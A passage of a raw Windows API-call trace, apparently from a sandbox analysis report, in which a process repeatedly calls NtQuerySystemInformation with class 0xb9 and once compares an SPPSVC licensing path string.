NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0229.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0229.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x20, ResultLength=0x0) [0229.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f0, Length=0x20, ResultLength=0x0) [0229.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f0, Length=0x20, ResultLength=0x0) [0229.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0229.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x28, ResultLength=0x0) [0229.578] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0229.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0229.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0229.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0229.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0229.582] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0229.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0229.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd480, Length=0x28, ResultLength=0x0) [0229.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0229.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.583] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd500, Length=0x28, ResultLength=0x0) [0229.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd500, Length=0x28, ResultLength=0x0) [0229.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0229.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x20, ResultLength=0x0) [0229.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0229.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0229.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0229.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0229.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x20, ResultLength=0x0) [0229.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f0, Length=0x20, ResultLength=0x0) [0229.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f0, Length=0x20, ResultLength=0x0) [0229.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x50, ResultLength=0x0) [0229.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x50, ResultLength=0x0) [0229.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x50, ResultLength=0x0) [0229.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x50, ResultLength=0x0) [0229.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.587] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x50, ResultLength=0x0) [0229.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x50, ResultLength=0x0) [0229.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x50, ResultLength=0x0) [0229.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.588] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x38, ResultLength=0x0) [0229.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x28, ResultLength=0x0) [0229.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x28, ResultLength=0x0) [0229.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x28, ResultLength=0x0) [0229.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x28, ResultLength=0x0) [0229.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0229.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x38, ResultLength=0x0) [0229.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0229.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0229.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcec0, Length=0x20, ResultLength=0x0) [0229.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0229.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0229.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0229.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x38, ResultLength=0x0) [0229.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x38, ResultLength=0x0) [0229.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0229.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0229.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0229.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0229.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0229.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0229.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0229.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0229.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0229.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0229.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0229.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0229.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0229.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0229.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0229.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0229.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0229.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0229.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0229.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0229.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0229.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0229.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0229.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0229.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0229.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0229.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0229.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0229.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0229.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0229.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0229.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0229.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0229.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0229.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0229.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0229.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0229.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0229.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0229.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0229.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0229.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.615] NtQuerySystemInformation 